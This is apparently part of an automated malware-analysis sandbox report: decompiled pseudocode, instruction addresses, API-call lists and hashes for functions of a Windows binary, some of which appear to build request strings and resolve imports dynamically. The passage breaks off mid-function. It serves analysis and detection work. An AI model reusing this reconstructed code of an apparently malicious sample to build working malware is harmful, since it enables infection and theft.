                                                                                                                                                                                                    						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                    						_t55 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    						__imp__(_t55 + 0x40);
                                                                                                                                                                                                    						_t57 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    						_t106 = E04F61A30(1, _t98, _t108,  *_t57);
                                                                                                                                                                                                    						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                    						if(_t106 != 0) {
                                                                                                                                                                                                    							StrTrimA(_t106, 0x4f6c2a4);
                                                                                                                                                                                                    							_t63 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    							_push(_t106);
                                                                                                                                                                                                    							_t15 = _t63 + 0x4f6e252; // 0x616d692f
                                                                                                                                                                                                    							_t65 = E04F62773(_t15);
                                                                                                                                                                                                    							_v20 = _t65;
                                                                                                                                                                                                    							if(_t65 != 0) {
                                                                                                                                                                                                    								_t92 = __imp__;
                                                                                                                                                                                                    								 *_t92(_t106, _v4);
                                                                                                                                                                                                    								 *_t92(_t103, _v0);
                                                                                                                                                                                                    								_t93 = __imp__;
                                                                                                                                                                                                    								 *_t93(_t103, _v32);
                                                                                                                                                                                                    								 *_t93(_t103, _t106);
                                                                                                                                                                                                    								_t71 = E04F632F0(0xffffffffffffffff, _t103, _v32, _v28);
                                                                                                                                                                                                    								_v56 = _t71;
                                                                                                                                                                                                    								if(_t71 != 0 && _t71 != 0x10d2) {
                                                                                                                                                                                                    									E04F65BEA();
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								HeapFree( *0x4f6d238, 0, _v48);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							HeapFree( *0x4f6d238, 0, _t106);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						HeapFree( *0x4f6d238, 0, _t103);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, 0, _a24);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				HeapFree( *0x4f6d238, 0, _t108);
                                                                                                                                                                                                    				return _a12;
                                                                                                                                                                                                    			}

















































                                                                                                                                                                                                    0x04f61d4c
                                                                                                                                                                                                    0x04f61d4c
                                                                                                                                                                                                    0x04f61d4c
                                                                                                                                                                                                    0x04f61d51
                                                                                                                                                                                                    0x04f61d57
                                                                                                                                                                                                    0x04f61d61
                                                                                                                                                                                                    0x04f61d63
                                                                                                                                                                                                    0x04f61d63
                                                                                                                                                                                                    0x04f61d70
                                                                                                                                                                                                    0x04f61d7b
                                                                                                                                                                                                    0x04f61d7e
                                                                                                                                                                                                    0x04f61d89
                                                                                                                                                                                                    0x04f61d8c
                                                                                                                                                                                                    0x04f61d91
                                                                                                                                                                                                    0x04f61d94
                                                                                                                                                                                                    0x04f61d99
                                                                                                                                                                                                    0x04f61d9c
                                                                                                                                                                                                    0x04f61da8
                                                                                                                                                                                                    0x04f61db5
                                                                                                                                                                                                    0x04f61db7
                                                                                                                                                                                                    0x04f61dbd
                                                                                                                                                                                                    0x04f61dc2
                                                                                                                                                                                                    0x04f61dcd
                                                                                                                                                                                                    0x04f61dcf
                                                                                                                                                                                                    0x04f61dd2
                                                                                                                                                                                                    0x04f61dd9
                                                                                                                                                                                                    0x04f61ddd
                                                                                                                                                                                                    0x04f61ddf
                                                                                                                                                                                                    0x04f61de4
                                                                                                                                                                                                    0x04f61df0
                                                                                                                                                                                                    0x04f61df2
                                                                                                                                                                                                    0x04f61dfe
                                                                                                                                                                                                    0x04f61e00
                                                                                                                                                                                                    0x04f61e00
                                                                                                                                                                                                    0x04f61e0b
                                                                                                                                                                                                    0x04f61e0f
                                                                                                                                                                                                    0x04f61e11
                                                                                                                                                                                                    0x04f61e16
                                                                                                                                                                                                    0x04f61e22
                                                                                                                                                                                                    0x04f61e24
                                                                                                                                                                                                    0x04f61e30
                                                                                                                                                                                                    0x04f61e32
                                                                                                                                                                                                    0x04f61e32
                                                                                                                                                                                                    0x04f61e38
                                                                                                                                                                                                    0x04f61e4b
                                                                                                                                                                                                    0x04f61e4f
                                                                                                                                                                                                    0x04f61e56
                                                                                                                                                                                                    0x04f61e59
                                                                                                                                                                                                    0x04f61e5e
                                                                                                                                                                                                    0x04f61e69
                                                                                                                                                                                                    0x04f61e6b
                                                                                                                                                                                                    0x04f61e6e
                                                                                                                                                                                                    0x04f61e6e
                                                                                                                                                                                                    0x04f61e70
                                                                                                                                                                                                    0x04f61e77
                                                                                                                                                                                                    0x04f61e7a
                                                                                                                                                                                                    0x04f61e7f
                                                                                                                                                                                                    0x04f61e89
                                                                                                                                                                                                    0x04f61e8b
                                                                                                                                                                                                    0x04f61e93
                                                                                                                                                                                                    0x04f61eac
                                                                                                                                                                                                    0x04f61eb0
                                                                                                                                                                                                    0x04f61ebc
                                                                                                                                                                                                    0x04f61ec1
                                                                                                                                                                                                    0x04f61eca
                                                                                                                                                                                                    0x04f61edb
                                                                                                                                                                                                    0x04f61edf
                                                                                                                                                                                                    0x04f61ee8
                                                                                                                                                                                                    0x04f61eee
                                                                                                                                                                                                    0x04f61efb
                                                                                                                                                                                                    0x04f61f08
                                                                                                                                                                                                    0x04f61f0e
                                                                                                                                                                                                    0x04f61f1a
                                                                                                                                                                                                    0x04f61f20
                                                                                                                                                                                                    0x04f61f25
                                                                                                                                                                                                    0x04f61f26
                                                                                                                                                                                                    0x04f61f2d
                                                                                                                                                                                                    0x04f61f32
                                                                                                                                                                                                    0x04f61f38
                                                                                                                                                                                                    0x04f61f3e
                                                                                                                                                                                                    0x04f61f45
                                                                                                                                                                                                    0x04f61f4c
                                                                                                                                                                                                    0x04f61f52
                                                                                                                                                                                                    0x04f61f59
                                                                                                                                                                                                    0x04f61f5d
                                                                                                                                                                                                    0x04f61f68
                                                                                                                                                                                                    0x04f61f6d
                                                                                                                                                                                                    0x04f61f73
                                                                                                                                                                                                    0x04f61f7c
                                                                                                                                                                                                    0x04f61f7c
                                                                                                                                                                                                    0x04f61f8d
                                                                                                                                                                                                    0x04f61f8d
                                                                                                                                                                                                    0x04f61f9c
                                                                                                                                                                                                    0x04f61f9c
                                                                                                                                                                                                    0x04f61fab
                                                                                                                                                                                                    0x04f61fab
                                                                                                                                                                                                    0x04f61fbd
                                                                                                                                                                                                    0x04f61fbd
                                                                                                                                                                                                    0x04f61fcc
                                                                                                                                                                                                    0x04f61fdd

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04F61D63
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F61DB0
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F61DCD
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F61DF0
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F61E00
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F61E22
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F61E32
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F61E69
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F61E89
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F61EA6
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04F61EB6
                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(05929570), ref: 04F61ECA
                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(05929570), ref: 04F61EE8
                                                                                                                                                                                                      • Part of subcall function 04F61A30: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04F61EFB,?,059295B0), ref: 04F61A5B
                                                                                                                                                                                                      • Part of subcall function 04F61A30: lstrlen.KERNEL32(?,?,?,04F61EFB,?,059295B0), ref: 04F61A63
                                                                                                                                                                                                      • Part of subcall function 04F61A30: strcpy.NTDLL ref: 04F61A7A
                                                                                                                                                                                                      • Part of subcall function 04F61A30: lstrcat.KERNEL32(00000000,?), ref: 04F61A85
                                                                                                                                                                                                      • Part of subcall function 04F61A30: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F61EFB,?,059295B0), ref: 04F61AA2
                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,04F6C2A4,?,059295B0), ref: 04F61F1A
                                                                                                                                                                                                      • Part of subcall function 04F62773: lstrlen.KERNEL32(?,00000000,00000000,04F61F32,616D692F,00000000), ref: 04F6277F
                                                                                                                                                                                                      • Part of subcall function 04F62773: lstrlen.KERNEL32(?), ref: 04F62787
                                                                                                                                                                                                      • Part of subcall function 04F62773: lstrcpy.KERNEL32(00000000,?), ref: 04F6279E
                                                                                                                                                                                                      • Part of subcall function 04F62773: lstrcat.KERNEL32(00000000,?), ref: 04F627A9
                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 04F61F45
                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F61F4C
                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 04F61F59
                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 04F61F5D
                                                                                                                                                                                                      • Part of subcall function 04F632F0: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04F633A2
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04F61F8D
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04F61F9C
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,059295B0), ref: 04F61FAB
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F61FBD
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 04F61FCC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3080378247-0
                                                                                                                                                                                                    • Opcode ID: 47a38bdd7880596f074e8e8e4abb7610abceb6f13b7a86ed50841ceb0a5b714d
                                                                                                                                                                                                    • Instruction ID: a56edbd9f0ec5649681ba07abf3fa2b73dda48f33c422b5715c0d78046930204
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47a38bdd7880596f074e8e8e4abb7610abceb6f13b7a86ed50841ceb0a5b714d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F61AA32A00208FFE711ABA8FD48F5A7BE8EB48744F050114F9A9D7254DB39ED06DB61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                    			E04F6AD65(long _a4, long _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				LONG* _v28;
                                                                                                                                                                                                    				long _v40;
                                                                                                                                                                                                    				long _v44;
                                                                                                                                                                                                    				long _v48;
                                                                                                                                                                                                    				CHAR* _v52;
                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                    				CHAR* _v60;
                                                                                                                                                                                                    				long _v64;
                                                                                                                                                                                                    				signed int* _v68;
                                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                    				intOrPtr* _t82;
                                                                                                                                                                                                    				intOrPtr* _t83;
                                                                                                                                                                                                    				intOrPtr* _t85;
                                                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                                                    				intOrPtr* _t95;
                                                                                                                                                                                                    				intOrPtr* _t98;
                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                    				long _t116;
                                                                                                                                                                                                    				void _t125;
                                                                                                                                                                                                    				void* _t131;
                                                                                                                                                                                                    				signed short _t133;
                                                                                                                                                                                                    				struct HINSTANCE__* _t138;
                                                                                                                                                                                                    				signed int* _t139;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t139 = _a4;
                                                                                                                                                                                                    				_v28 = _t139[2] + 0x4f60000;
                                                                                                                                                                                                    				_t115 = _t139[3] + 0x4f60000;
                                                                                                                                                                                                    				_t131 = _t139[4] + 0x4f60000;
                                                                                                                                                                                                    				_v8 = _t139[7];
                                                                                                                                                                                                    				_v60 = _t139[1] + 0x4f60000;
                                                                                                                                                                                                    				_v16 = _t139[5] + 0x4f60000;
                                                                                                                                                                                                    				_v64 = _a8;
                                                                                                                                                                                                    				_v72 = 0x24;
                                                                                                                                                                                                    				_v68 = _t139;
                                                                                                                                                                                                    				_v56 = 0;
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				_v48 = 0;
                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                    				if(( *_t139 & 0x00000001) == 0) {
                                                                                                                                                                                                    					_a8 =  &_v72;
                                                                                                                                                                                                    					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t138 =  *_v28;
                                                                                                                                                                                                    				_t76 = _a8 - _t115 >> 2 << 2;
                                                                                                                                                                                                    				_t133 =  *(_t131 + _t76);
                                                                                                                                                                                                    				_a4 = _t76;
                                                                                                                                                                                                    				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                                                                                                                                                                    				_v56 = _t80;
                                                                                                                                                                                                    				_t81 = _t133 + 0x4f60002;
                                                                                                                                                                                                    				if(_t80 == 0) {
                                                                                                                                                                                                    					_t81 = _t133 & 0x0000ffff;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_v52 = _t81;
                                                                                                                                                                                                    				_t82 =  *0x4f6d1a0; // 0x0
                                                                                                                                                                                                    				_t116 = 0;
                                                                                                                                                                                                    				if(_t82 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					if(_t138 != 0) {
                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                    						_t83 =  *0x4f6d1a0; // 0x0
                                                                                                                                                                                                    						_v48 = _t138;
                                                                                                                                                                                                    						if(_t83 != 0) {
                                                                                                                                                                                                    							_t116 =  *_t83(2,  &_v72);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t116 != 0) {
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							 *_a8 = _t116;
                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                    							_t85 =  *0x4f6d1a0; // 0x0
                                                                                                                                                                                                    							if(_t85 != 0) {
                                                                                                                                                                                                    								_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                    								_v48 = _t138;
                                                                                                                                                                                                    								_v44 = _t116;
                                                                                                                                                                                                    								 *_t85(5,  &_v72);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							return _t116;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                    								_t116 = GetProcAddress(_t138, _v52);
                                                                                                                                                                                                    								if(_t116 == 0) {
                                                                                                                                                                                                    									_v40 = GetLastError();
                                                                                                                                                                                                    									_t90 =  *0x4f6d19c; // 0x0
                                                                                                                                                                                                    									if(_t90 != 0) {
                                                                                                                                                                                                    										_t116 =  *_t90(4,  &_v72);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if(_t116 == 0) {
                                                                                                                                                                                                    										_a4 =  &_v72;
                                                                                                                                                                                                    										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                                                                                                                                                                    										_t116 = _v44;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                                                                                                                                                                    								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                                                                                                                                                                    									_t116 =  *(_a4 + _v16);
                                                                                                                                                                                                    									if(_t116 != 0) {
                                                                                                                                                                                                    										goto L32;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t98 =  *0x4f6d1a0; // 0x0
                                                                                                                                                                                                    					if(_t98 == 0) {
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						_t138 = LoadLibraryA(_v60);
                                                                                                                                                                                                    						if(_t138 != 0) {
                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                    							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                                                                                                                                                                    								FreeLibrary(_t138);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								if(_t139[6] != 0) {
                                                                                                                                                                                                    									_t102 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                    									if(_t102 != 0) {
                                                                                                                                                                                                    										 *(_t102 + 4) = _t139;
                                                                                                                                                                                                    										_t125 =  *0x4f6d198; // 0x0
                                                                                                                                                                                                    										 *_t102 = _t125;
                                                                                                                                                                                                    										 *0x4f6d198 = _t102;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v40 = GetLastError();
                                                                                                                                                                                                    						_t104 =  *0x4f6d19c; // 0x0
                                                                                                                                                                                                    						if(_t104 == 0) {
                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                    							_a8 =  &_v72;
                                                                                                                                                                                                    							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                                                                                                                                                                    							return _v44;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t138 =  *_t104(3,  &_v72);
                                                                                                                                                                                                    						if(_t138 != 0) {
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t138 =  *_t98(1,  &_v72);
                                                                                                                                                                                                    					if(_t138 != 0) {
                                                                                                                                                                                                    						goto L13;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t116 =  *_t82(0,  &_v72);
                                                                                                                                                                                                    				if(_t116 != 0) {
                                                                                                                                                                                                    					goto L33;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L6;
                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x04f6ad74
                                                                                                                                                                                                    0x04f6ad8a
                                                                                                                                                                                                    0x04f6ad90
                                                                                                                                                                                                    0x04f6ad92
                                                                                                                                                                                                    0x04f6ad97
                                                                                                                                                                                                    0x04f6ad9d
                                                                                                                                                                                                    0x04f6ada2
                                                                                                                                                                                                    0x04f6ada5
                                                                                                                                                                                                    0x04f6adb3
                                                                                                                                                                                                    0x04f6adba
                                                                                                                                                                                                    0x04f6adbd
                                                                                                                                                                                                    0x04f6adc0
                                                                                                                                                                                                    0x04f6adc1
                                                                                                                                                                                                    0x04f6adc4
                                                                                                                                                                                                    0x04f6adc7
                                                                                                                                                                                                    0x04f6adca
                                                                                                                                                                                                    0x04f6adcf
                                                                                                                                                                                                    0x04f6adde
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6ade4
                                                                                                                                                                                                    0x04f6adee
                                                                                                                                                                                                    0x04f6adf8
                                                                                                                                                                                                    0x04f6adfd
                                                                                                                                                                                                    0x04f6adff
                                                                                                                                                                                                    0x04f6ae09
                                                                                                                                                                                                    0x04f6ae0c
                                                                                                                                                                                                    0x04f6ae0f
                                                                                                                                                                                                    0x04f6ae15
                                                                                                                                                                                                    0x04f6ae17
                                                                                                                                                                                                    0x04f6ae17
                                                                                                                                                                                                    0x04f6ae1a
                                                                                                                                                                                                    0x04f6ae1d
                                                                                                                                                                                                    0x04f6ae22
                                                                                                                                                                                                    0x04f6ae26
                                                                                                                                                                                                    0x04f6ae39
                                                                                                                                                                                                    0x04f6ae3b
                                                                                                                                                                                                    0x04f6aee3
                                                                                                                                                                                                    0x04f6aee3
                                                                                                                                                                                                    0x04f6aeea
                                                                                                                                                                                                    0x04f6aeed
                                                                                                                                                                                                    0x04f6aef7
                                                                                                                                                                                                    0x04f6aef7
                                                                                                                                                                                                    0x04f6aefb
                                                                                                                                                                                                    0x04f6af79
                                                                                                                                                                                                    0x04f6af7c
                                                                                                                                                                                                    0x04f6af7e
                                                                                                                                                                                                    0x04f6af7e
                                                                                                                                                                                                    0x04f6af85
                                                                                                                                                                                                    0x04f6af87
                                                                                                                                                                                                    0x04f6af91
                                                                                                                                                                                                    0x04f6af94
                                                                                                                                                                                                    0x04f6af97
                                                                                                                                                                                                    0x04f6af97
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6aefd
                                                                                                                                                                                                    0x04f6af00
                                                                                                                                                                                                    0x04f6af2e
                                                                                                                                                                                                    0x04f6af38
                                                                                                                                                                                                    0x04f6af3c
                                                                                                                                                                                                    0x04f6af44
                                                                                                                                                                                                    0x04f6af47
                                                                                                                                                                                                    0x04f6af4e
                                                                                                                                                                                                    0x04f6af58
                                                                                                                                                                                                    0x04f6af58
                                                                                                                                                                                                    0x04f6af5c
                                                                                                                                                                                                    0x04f6af61
                                                                                                                                                                                                    0x04f6af70
                                                                                                                                                                                                    0x04f6af76
                                                                                                                                                                                                    0x04f6af76
                                                                                                                                                                                                    0x04f6af5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6af07
                                                                                                                                                                                                    0x04f6af0a
                                                                                                                                                                                                    0x04f6af12
                                                                                                                                                                                                    0x04f6af27
                                                                                                                                                                                                    0x04f6af2c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6af2c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6af12
                                                                                                                                                                                                    0x04f6af00
                                                                                                                                                                                                    0x04f6aefb
                                                                                                                                                                                                    0x04f6ae41
                                                                                                                                                                                                    0x04f6ae48
                                                                                                                                                                                                    0x04f6ae58
                                                                                                                                                                                                    0x04f6ae61
                                                                                                                                                                                                    0x04f6ae65
                                                                                                                                                                                                    0x04f6aea8
                                                                                                                                                                                                    0x04f6aeb4
                                                                                                                                                                                                    0x04f6aedd
                                                                                                                                                                                                    0x04f6aeb6
                                                                                                                                                                                                    0x04f6aeba
                                                                                                                                                                                                    0x04f6aec0
                                                                                                                                                                                                    0x04f6aec8
                                                                                                                                                                                                    0x04f6aeca
                                                                                                                                                                                                    0x04f6aecd
                                                                                                                                                                                                    0x04f6aed3
                                                                                                                                                                                                    0x04f6aed5
                                                                                                                                                                                                    0x04f6aed5
                                                                                                                                                                                                    0x04f6aec8
                                                                                                                                                                                                    0x04f6aeba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6aeb4
                                                                                                                                                                                                    0x04f6ae6d
                                                                                                                                                                                                    0x04f6ae70
                                                                                                                                                                                                    0x04f6ae77
                                                                                                                                                                                                    0x04f6ae87
                                                                                                                                                                                                    0x04f6ae8a
                                                                                                                                                                                                    0x04f6ae9a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6aea0
                                                                                                                                                                                                    0x04f6ae81
                                                                                                                                                                                                    0x04f6ae85
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6ae85
                                                                                                                                                                                                    0x04f6ae52
                                                                                                                                                                                                    0x04f6ae56
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6ae56
                                                                                                                                                                                                    0x04f6ae2f
                                                                                                                                                                                                    0x04f6ae33
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04F6ADDE
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 04F6AE5B
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 04F6AE67
                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04F6AE9A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                    • API String ID: 948315288-3993045852
                                                                                                                                                                                                    • Opcode ID: 18842dfb2d4bc6061677a75fff329e831594f2d975dc897ca8b24151fa05d6d0
                                                                                                                                                                                                    • Instruction ID: 05dcfb7893a4d7eec4363540186af60eb5cffbf3dd418c8918c7dc6063e09925
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18842dfb2d4bc6061677a75fff329e831594f2d975dc897ca8b24151fa05d6d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1813BB5E00209EFDB10CFA9D984AAEB7F5FB49310F148029E956E7240EB74E946CB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                                                                                    			E04F615EE(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                                    				WCHAR* _t56;
                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                    				int _t58;
                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                                                    				intOrPtr* _t85;
                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t74 = __ecx;
                                                                                                                                                                                                    				_t79 =  *0x4f6d33c; // 0x5929bb0
                                                                                                                                                                                                    				_v20 = 8;
                                                                                                                                                                                                    				_v16 = GetTickCount();
                                                                                                                                                                                                    				_t42 = E04F63586(_t74,  &_v16);
                                                                                                                                                                                                    				_v12 = _t42;
                                                                                                                                                                                                    				if(_t42 == 0) {
                                                                                                                                                                                                    					_v12 = 0x4f6c1ac;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t44 = E04F65161(_t79);
                                                                                                                                                                                                    				_v8 = _t44;
                                                                                                                                                                                                    				if(_t44 != 0) {
                                                                                                                                                                                                    					_t85 = __imp__;
                                                                                                                                                                                                    					_t46 =  *_t85(_v12, _t69);
                                                                                                                                                                                                    					_t47 =  *_t85(_v8);
                                                                                                                                                                                                    					_t48 =  *_t85(_a4);
                                                                                                                                                                                                    					_t49 = lstrlenW(_a8);
                                                                                                                                                                                                    					_t53 = E04F68D59(lstrlenW(0x4f6eb28) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x4f6eb28) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                                                                                                                                                                                    					_v16 = _t53;
                                                                                                                                                                                                    					if(_t53 != 0) {
                                                                                                                                                                                                    						_t75 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    						_t73 =  *0x4f6d11c; // 0x4f6ab91
